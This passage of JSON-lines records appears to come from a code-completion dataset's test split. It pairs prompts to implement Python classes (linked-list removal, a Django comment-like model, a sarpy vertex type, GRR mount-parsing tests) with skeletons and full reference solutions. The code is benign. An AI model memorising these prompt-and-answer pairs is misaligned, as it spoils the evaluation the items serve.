ListNode()\ndump_node.next = head\ntmp_node = dump_node\nwhile tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\nreturn dump_node.next"], "bodies_text": "<|body_start_0|>\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n<|end_body_0|>\n\n<|body_start_1|>\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n \"\"\"注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\"\"\"\n <|body_0|>\n\n def removeElements2(self, head: ListNode, val: int) -> ListNode:\n \"\"\"listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n<|end_body_0|>\n\n<|body_start_1|>\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000231", "length_bytes": 2684, "license_type": "no_license", "methods": [{"docstring": "注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:", "name": "removeElements", "signature": "def removeElements(self, head: ListNode, val: int) -> ListNode"}, {"docstring": "listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:", "name": "removeElements2", "signature": "def removeElements2(self, head: ListNode, val: int) -> ListNode"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000328", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeElements(self, head: ListNode, val: int) -> ListNode: 注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\n- def removeElements2(self, head: ListNode, val: int) -> ListNode: listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeElements(self, head: ListNode, val: int) -> ListNode: 注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\n- def removeElements2(self, head: ListNode, val: int) -> ListNode: listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\n\n<|skeleton|>\nclass Solution:\n\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n \"\"\"注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\"\"\"\n <|body_0|>\n\n def removeElements2(self, head: ListNode, val: int) -> ListNode:\n \"\"\"listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n<|end_body_0|>\n\n<|body_start_1|>\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n<|end_body_1|>\n", "revision_id": "b1680014ce3f55ba952a1e64241c0cbb783cc436", "skeleton": "<|skeleton|>\nclass Solution:\n\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n \"\"\"注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\"\"\"\n <|body_0|>\n\n def removeElements2(self, head: ListNode, val: int) -> ListNode:\n \"\"\"listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n \"\"\"注意: 1. head为空时 2. 全部删除时 3. ListNode类有默认值 :param head: :param val: :return:\"\"\"\n def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\n while head and head.val == val:\n head = head.next\n if not head:\n return head\n node = head\n while node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\n return head\n\n def removeElements2(self, head: ListNode, val: int) -> ListNode:\n \"\"\"listnode加一个头结点! a->b->c 0->a->b->c :param head: :param val: :return:\"\"\"\n dump_node = ListNode()\n dump_node.next = head\n tmp_node = dump_node\n while tmp_node.next:\n if tmp_node.next.val == val:\n tmp_node.next = tmp_node.next.next\n else:\n tmp_node = tmp_node.next\n return dump_node.next\n", "source": "the_stack_v2_python_sparse", "source_path": "a_203.py", "source_repo": "sun510001/leetcode_jianzhi_offer_2", "split": "test", "star_events_count": 0} {"blob_id": "7221e4aee4ad15d7c14502266429ba4009b13d74", "bodies": ["like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\nlike.save()\nreturn like", "try:\n like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n return like\nexcept CommentLike.DoesNotExist:\n return None"], "bodies_text": "<|body_start_0|>\n like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n like.save()\n return like\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n return like\n except CommentLike.DoesNotExist:\n return None\n<|end_body_1|>\n", "class_docstring": "", "class_name": "CommentLike", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CommentLike:\n\n def add_comment_like(comment_id=0, user_id=0):\n \"\"\"增加一条点赞记录\"\"\"\n <|body_0|>\n\n def user_liked(comment_id=0, user_id=0):\n \"\"\"查询某人是否点赞了评论\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n like.save()\n return like\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n return like\n except CommentLike.DoesNotExist:\n return None\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000232", "length_bytes": 979, "license_type": "no_license", "methods": [{"docstring": "增加一条点赞记录", "name": "add_comment_like", "signature": "def add_comment_like(comment_id=0, user_id=0)"}, {"docstring": "查询某人是否点赞了评论", "name": "user_liked", "signature": "def user_liked(comment_id=0, user_id=0)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006397", "prompt": "Implement the Python class `CommentLike` described below.\n\nClass description:\nImplement the CommentLike class.\n\nMethod signatures and docstrings:\n- def add_comment_like(comment_id=0, user_id=0): 增加一条点赞记录\n- def user_liked(comment_id=0, user_id=0): 查询某人是否点赞了评论", "prompted_full_text": "Implement the Python class `CommentLike` described below.\n\nClass description:\nImplement the CommentLike class.\n\nMethod signatures and docstrings:\n- def add_comment_like(comment_id=0, user_id=0): 增加一条点赞记录\n- def user_liked(comment_id=0, user_id=0): 查询某人是否点赞了评论\n\n<|skeleton|>\nclass CommentLike:\n\n def add_comment_like(comment_id=0, user_id=0):\n \"\"\"增加一条点赞记录\"\"\"\n <|body_0|>\n\n def user_liked(comment_id=0, user_id=0):\n \"\"\"查询某人是否点赞了评论\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n like.save()\n return like\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n return like\n except CommentLike.DoesNotExist:\n return None\n<|end_body_1|>\n", "revision_id": "1fa6ab22a04f3cd2c1a130803833c5c22460a382", "skeleton": "<|skeleton|>\nclass CommentLike:\n\n def add_comment_like(comment_id=0, user_id=0):\n \"\"\"增加一条点赞记录\"\"\"\n <|body_0|>\n\n def user_liked(comment_id=0, user_id=0):\n \"\"\"查询某人是否点赞了评论\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CommentLike:\n def add_comment_like(comment_id=0, user_id=0):\n \"\"\"增加一条点赞记录\"\"\"\n like = CommentLike(comment_id=comment_id, user_id=user_id, status=1)\n like.save()\n return like\n\n def user_liked(comment_id=0, user_id=0):\n \"\"\"查询某人是否点赞了评论\"\"\"\n try:\n like = CommentLike.objects.filter(status=1).get(comment_id=comment_id, user_id=user_id)\n return like\n except CommentLike.DoesNotExist:\n return None\n", "source": "the_stack_v2_python_sparse", "source_path": "app/models/blog/comment_like.py", "source_repo": "tomszhou/pony", "split": "test", "star_events_count": 1} {"blob_id": "1155b519a9a3255c0864d4760cad13aafd5602c2", "bodies": ["if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\nif '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\nself.index = index\nsuper(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)", "if array is None:\n return None\nif isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\nraise ValueError(_array_type_text.format(type(array)))"], "bodies_text": "<|body_start_0|>\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "class_docstring": "An array element of XYType.", "class_name": "XYVertexType", "detected_licenses": ["MIT", "LicenseRef-scancode-free-unknown", "LicenseRef-scancode-public-domain"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n <|body_0|>\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000233", "length_bytes": 10131, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- X : float Y : float index : int kwargs", "name": "__init__", "signature": "def __init__(self, X=None, Y=None, index=None, **kwargs)"}, {"docstring": "Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType", "name": "from_array", "signature": "def from_array(cls, array, index=1)"}], "n_methods": 2, "prompt": "Implement the Python class `XYVertexType` described below.\n\nClass description:\nAn array element of XYType.\n\nMethod signatures and docstrings:\n- def __init__(self, X=None, Y=None, index=None, **kwargs): Parameters ---------- X : float Y : float index : int kwargs\n- def from_array(cls, array, index=1): Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType", "prompted_full_text": "Implement the Python class `XYVertexType` described below.\n\nClass description:\nAn array element of XYType.\n\nMethod signatures and docstrings:\n- def __init__(self, X=None, Y=None, index=None, **kwargs): Parameters ---------- X : float Y : float index : int kwargs\n- def from_array(cls, array, index=1): Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\n\n<|skeleton|>\nclass XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n <|body_0|>\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n<|end_body_1|>\n", "revision_id": "de1b1886f161a83b6c89aadc7a2c7cfc4892ef81", "skeleton": "<|skeleton|>\nclass XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n <|body_0|>\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class XYVertexType:\n \"\"\"An array element of XYType.\"\"\"\n\n def __init__(self, X=None, Y=None, index=None, **kwargs):\n \"\"\"Parameters ---------- X : float Y : float index : int kwargs\"\"\"\n if '_xml_ns' in kwargs:\n self._xml_ns = kwargs['_xml_ns']\n if '_xml_ns_key' in kwargs:\n self._xml_ns_key = kwargs['_xml_ns_key']\n self.index = index\n super(XYVertexType, self).__init__(X=X, Y=Y, **kwargs)\n\n def from_array(cls, array, index=1):\n \"\"\"Create from an array type entry. Parameters ---------- array: numpy.ndarray|list|tuple assumed [X, Y] index : int array index Returns ------- XYVertexType\"\"\"\n if array is None:\n return None\n if isinstance(array, (numpy.ndarray, list, tuple)):\n if len(array) < 2:\n raise ValueError(_len2_array_text.format(array))\n return cls(X=array[0], Y=array[1], index=index)\n raise ValueError(_array_type_text.format(type(array)))\n", "source": "the_stack_v2_python_sparse", "source_path": "sarpy/io/phase_history/cphd1_elements/blocks.py", "source_repo": "ngageoint/sarpy", "split": "test", "star_events_count": 192} {"blob_id": "32d62d93df88ed9350aba218d19f3a16dbf707c7", "bodies": ["proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\nwith contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)", "with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())"], "bodies_text": "<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "class_docstring": "Test the linux client utils.", "class_name": "ClientUtilsLinuxTest", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000234", "length_bytes": 4763, "license_type": "permissive", "methods": [{"docstring": "Test the parser for linux mounts.", "name": "testLinuxGetRawDevice", "signature": "def testLinuxGetRawDevice(self)"}, {"docstring": "Tests the linux transaction log.", "name": "testLinuxTransactionLog", "signature": "def testLinuxTransactionLog(self)"}], "n_methods": 2, "prompt": "Implement the Python class `ClientUtilsLinuxTest` described below.\n\nClass description:\nTest the linux client utils.\n\nMethod signatures and docstrings:\n- def testLinuxGetRawDevice(self): Test the parser for linux mounts.\n- def testLinuxTransactionLog(self): Tests the linux transaction log.", "prompted_full_text": "Implement the Python class `ClientUtilsLinuxTest` described below.\n\nClass description:\nTest the linux client utils.\n\nMethod signatures and docstrings:\n- def testLinuxGetRawDevice(self): Test the parser for linux mounts.\n- def testLinuxTransactionLog(self): Tests the linux transaction log.\n\n<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone /sys/fs/fuse/connections fusectl rw,relatime 0 0\\nnone /sys/kernel/debug debugfs rw,relatime 0 0\\nnone /sys/kernel/security securityfs rw,relatime 0 0\\nnone /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0\\nnone /var/run tmpfs rw,nosuid,relatime 0 0\\nnone /var/lock tmpfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /lib/init/rw tmpfs rw,nosuid,relatime,mode=755 0 0\\n/dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0\\n/dev/mapper/usr /usr/local/ ext4 rw,relatime,barrier=1,data=writeback 0 0\\nbinfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw,nosuid,relatime 0 0\\nserver.nfs:/vol/home /home/user nfs rw,nosuid,relatime 0 0\\n'\n with contextlib.ExitStack() as stack:\n stack.enter_context(mock.patch.object(client_utils_linux, 'MOUNTPOINT_CACHE', new=[0, None]))\n mountpoints = client_utils_linux.GetMountpoints(proc_mounts)\n stack.enter_context(mock.patch.object(client_utils_linux, 'GetMountpoints', return_value=mountpoints))\n for filename, expected_device, expected_path, device_type in [('/etc/passwd', '/dev/mapper/root', '/etc/passwd', rdf_paths.PathSpec.PathType.OS), ('/usr/local/bin/ls', '/dev/mapper/usr', '/bin/ls', rdf_paths.PathSpec.PathType.OS), ('/proc/net/sys', 'none', '/net/sys', rdf_paths.PathSpec.PathType.UNSET), ('/home/user/test.txt', 'server.nfs:/vol/home', '/test.txt', rdf_paths.PathSpec.PathType.UNSET)]:\n raw_pathspec, path = client_utils_linux.GetRawDevice(filename)\n self.assertEqual(expected_device, raw_pathspec.path)\n self.assertEqual(device_type, raw_pathspec.pathtype)\n self.assertEqual(expected_path, path)\n<|end_body_0|>\n\n<|body_start_1|>\n with tempfile.NamedTemporaryFile() as fd:\n log = client_utils_linux.TransactionLog(logfile=fd.name)\n grr_message = rdf_flows.GrrMessage(session_id='W:test')\n log.Write(grr_message)\n self.assertEqual(grr_message, log.Get())\n log.Clear()\n self.assertIsNone(log.Get())\n<|end_body_1|>\n", "revision_id": "44c0eb8c938302098ef7efae8cfd6b90bcfbb2d6", "skeleton": "<|skeleton|>\nclass ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n <|body_0|>\n\n def testLinuxTransactionLog(self):\n \"\"\"Tests the linux transaction log.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ClientUtilsLinuxTest:\n \"\"\"Test the linux client utils.\"\"\"\n\n def testLinuxGetRawDevice(self):\n \"\"\"Test the parser for linux mounts.\"\"\"\n proc_mounts = 'rootfs / rootfs rw 0 0\\nnone /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0\\nnone /proc proc rw,nosuid,nodev,noexec,relatime 0 0\\nnone /dev devtmpfs rw,relatime,size=4056920k,nr_inodes=1014230,mode=755 0 0\\nnone /dev/pts devpts rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000 0 0\\n/dev/mapper/root / ext4 rw,relatime,errors=remount-ro,barrier=1,data=ordered 0 0\\nnone 